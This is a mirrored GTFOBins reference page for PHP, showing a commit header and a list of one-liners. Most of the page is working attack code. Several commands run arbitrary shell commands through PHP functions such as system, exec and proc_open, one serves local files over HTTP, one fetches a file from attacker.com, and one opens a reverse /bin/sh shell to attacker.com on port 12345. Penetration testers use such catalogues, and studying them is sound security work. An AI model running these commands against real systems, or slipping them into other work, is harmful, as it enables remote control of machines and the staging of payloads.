GTFOBins.github.io/php.md at 4ea28f8c4884c4f9d5651351db29b200119b2324 - GTFOBins.github.io - git.dotya.ml

mirror/GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00

Andrea Cardaci 4ea28f8c48 Use getenv instead of $_ENV in php as it is configuration-dependent

2018-05-25 11:19:13 +02:00

1.6 KiB

Raw Blame History

functions

exec-non-interactive

upload

download

reverse-shell

code
export CMD="ls /" php -r 'system(getenv("CMD"));'

code
export CMD="ls /" php -r 'passthru(getenv("CMD"));'

code
export CMD="ls /" php -r 'print(shell_exec(getenv("CMD")));'

code
export CMD="ls /" php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\n",$r));'

code
export CMD="ls /" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

code
export CMD="ls /" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

description	code
Serve files in the local folder running an HTTP server.	LHOST=0.0.0.0 LPORT=8888 php -S $LHOST:$LPORT

description	code
Fetch a remote file via HTTP GET request.	export URL=http://attacker.com/file_to_get export LFILE=where_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

description	code
Run `nc -l -p 12345` on the attacker box to receive the shell.	export RHOST=attacker.com export RPORT=12345 php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'